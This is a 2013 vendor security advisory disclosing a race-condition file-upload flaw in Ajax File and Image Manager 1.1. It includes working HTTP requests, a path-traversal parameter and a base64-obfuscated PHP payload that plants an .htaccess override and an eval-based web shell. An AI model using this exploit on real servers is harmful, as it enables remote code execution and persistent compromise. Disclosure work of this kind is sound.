Ajax File And Image Manager 1.1 Code Execution

`-----------------------------------------------------------  
(PT-2013-41) Positive Technologies Security Advisory   
  
Arbitrary Code Execution in Ajax File and Image Manager  
-----------------------------------------------------------  
  
---[ Vulnerable software ]  
  
Ajax File and Image Manager  
Version: 1.1 and earlier  
  
Link:  
http://www.phpletter.com/DOWNLOAD/  
  
---[ Severity level ]  
  
Severity level: High  
Impact: Arbitrary Code Execution  
Access Vector: Remote  
  
  
CVSS v2:   
Base Score: 10  
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)  
  
CVE: not assigned  
  
---[ Software description ]  
  
Ajax file and Image Manager is an open source file manager, which employs Ajax and PHP. It can be used as a standalone web application, as well as the TinyMCE/FCKeditor plugin.  
  
---[ Vulnerability description ]  
  
The specialists of the Positive Research center have detected "Arbitrary Code Execution" vulnerability in Ajax File and Image Manager.  
  
Due to incorrect application architecture, validation of file extension is implemented after uploading file. Uploaded file will subsequently be removed if its extension is not allowed by whitelist. Thus, you can refer to the uploaded file before its removal, resulting in arbitrary code execution.  
  
Vulnerability exploitation example:  
  
Send the following requests simultaneously:  
  
1)  
  
POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1  
  
Host: localhost  
  
User-Agent: google/agent  
  
Connection: keep-alive  
  
Content-Type: multipart/form-data; boundary=---------------------------307211690811  
  
Content-Length: 613  
-----------------------------307211690811  
  
Content-Disposition: form-data; name="file"; filename="1.php"  
  
Content-Type: image/jpeg  
  
  
<?php  
  
eval(base64_decode("JGZwID0gZm9wZW4oIi5odGFjY2VzcyIsICJ3Iik7CiRodGFjY2VzcyA9ICc8RmlsZXNNYXRjaCAi  
  
LihwaHApJCI+CkFsbG93IGZyb20gYWxsCjwvRmlsZXNtYXRjaD4nOwokdGVzdCA9IGZ3cml0ZSgk  
  
ZnAsICRodGFjY2Vzcyk7CmZjbG9zZSgkZnApOwojaWYoZmlsZV9leGlzdHMoIjIucGhwIikpIHtk  
  
aWUoKTt9CiRmcDEgPSBmb3BlbigiMi5waHAiLCAidyIpOwokY29kZSA9ICc8P3BocCBldmFsKCRf  
  
UkVRVUVTVFtjXSk7ID8+JzsKJHRlc3QgPSBmd3JpdGUoJGZwMSwgJGNvZGUpOwpmY2xvc2UoJGZw  
  
MSk7"));   
  
?>  
  
-----------------------------307211690811—  
  
  
  
2)  
  
  
POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1  
  
Host: localhost  
  
User-Agent: google/agent  
  
Connection: keep-alive  
  
Content-Type: multipart/form-data; boundary=---------------------------307211690811  
  
Content-Length: 240  
-----------------------------307211690811  
  
Content-Disposition: form-data; name="file"; filename=".htaccess"  
  
Content-Type: image/jpeg  
  
  
<FilesMatch ".(php)$">  
  
Allow from all  
  
</FilesMatch>  
  
-----------------------------307211690811—  
  
  
  
3)  
  
  
GET /targethost/images/banner/1.php HTTP/1.1  
  
Host: localhost  
  
Connection: keep-alive  
  
This will also create the following files in the /targethost/images/banner directory:  
.htaccess with  
  
  
<FilesMatch ".(php)$">  
  
Allow from all  
  
</Filesmatch>  
  
  
and 2.php with <?php eval($_REQUEST[c]); ?>.  
  
---[ How to fix ]  
  
No solution  
  
---[ Advisory status ]  
  
20.06.2013 - Vendor gets vulnerability details  
04.09.2013 - Vulnerability details were sent to CERT  
17.09.2013 - Public disclosure  
  
---[ Credits ]  
  
The vulnerability was detected by Ilya Krupenko, Positive Research Center (Positive Technologies Company)  
`